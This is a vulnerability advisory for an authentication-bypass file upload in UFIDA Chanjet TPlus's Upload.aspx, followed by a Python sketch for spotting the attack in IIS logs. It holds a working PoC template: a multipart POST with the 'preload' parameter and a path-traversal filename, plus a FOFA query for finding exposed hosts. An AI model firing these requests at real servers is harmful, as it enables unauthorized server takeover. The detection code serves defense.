chanjet-tplus-fileupload: UFIDA Chanjet TPlus Upload.aspx - Arbitrary File Upload

Date: 2025-08-01 | Affected software: UFIDA Chanjet TPlus | PoC: public

Vulnerability description

There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.

PoC code [public]

id: chanjet-tplus-fileupload

info:
  name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="畅捷通-TPlus"
  tags: yonyou,chanjet,upload,intrusive,vuln

http:
  - raw:
      - |
        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
        Accept-Encoding: gzip

        ------WebKitFormBoundaryuirnbcvo
        Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
        Content-Type: image/jpeg

        {{randstr_2}}
        ------WebKitFormBoundaryuirnbcvo--
      - |
        GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && status_code_2==200"
          - "contains(body_2, '{{randstr_2}}')"
        condition: and
# digest: 4b0a00483046022100965465f04fba1599f7b04e81d63cc4b3d36a9e13d38d1e644522a9e93141e32a022100ed7f3c313cd8197fad40e9a3c296349a8a4bcd02359716c953f20dba82010209:922c64590222798bb761d5b6d8e72950
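
Detection sketch for the request pair in the template above, as an added example that is not part of the original template: it scans IIS W3C log lines for a POST to Upload.aspx that carries the preload parameter, then flags a 200 GET from the same client for a file under /tplus/img/login/ that was never served before. The log field layout, the sample lines and the function names are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

UPLOAD_STEM = "/tplus/sm/setupaccount/upload.aspx"   # endpoint named in the template
DROP_PREFIX = "/tplus/img/login/"                    # directory the template reads back from

# Constructed sample in IIS W3C format (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-08-01 09:00:01 GET /tplus/img/login/logo.png - 10.0.0.5 200
2025-08-01 09:14:10 POST /tplus/SM/SetupAccount/Upload.aspx preload=1 203.0.113.7 200
2025-08-01 09:14:11 GET /tplus/img/login/aB3xQ.jpg - 203.0.113.7 200
2025-08-01 09:15:00 GET /tplus/img/login/logo.png - 203.0.113.7 200
2025-08-01 09:20:00 POST /tplus/SM/SetupAccount/Upload.aspx - 10.0.0.9 302
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):   # skip malformed or truncated rows
                yield dict(zip(fields, values))

def find_upload_abuse(text):
    """Return (upload_posts, new_files) alerts in log order."""
    seen_files = set()   # files under DROP_PREFIX already served (baseline)
    uploaders = set()    # client IPs that POSTed to Upload.aspx with preload
    posts, new_files = [], []
    for r in parse_w3c(text):
        stem = r["cs-uri-stem"].lower()      # IIS paths are case-insensitive
        query = parse_qs(r["cs-uri-query"].lower(), keep_blank_values=True)
        if r["cs-method"] == "POST" and stem == UPLOAD_STEM and "preload" in query:
            uploaders.add(r["c-ip"])
            posts.append((r["date"], r["time"], r["c-ip"], r["sc-status"]))
        elif r["cs-method"] == "GET" and stem.startswith(DROP_PREFIX) and r["sc-status"] == "200":
            # A file the baseline never saw, fetched by a client that just uploaded
            if r["c-ip"] in uploaders and stem not in seen_files:
                new_files.append((r["c-ip"], r["cs-uri-stem"]))
            seen_files.add(stem)
    return posts, new_files

if __name__ == "__main__":
    print(find_upload_abuse(SAMPLE_LOG))
```

IIS logs do not record the multipart body, so the traversal sequence in the filename field is not visible here; the correlation relies on the request line and on which files appear afterwards.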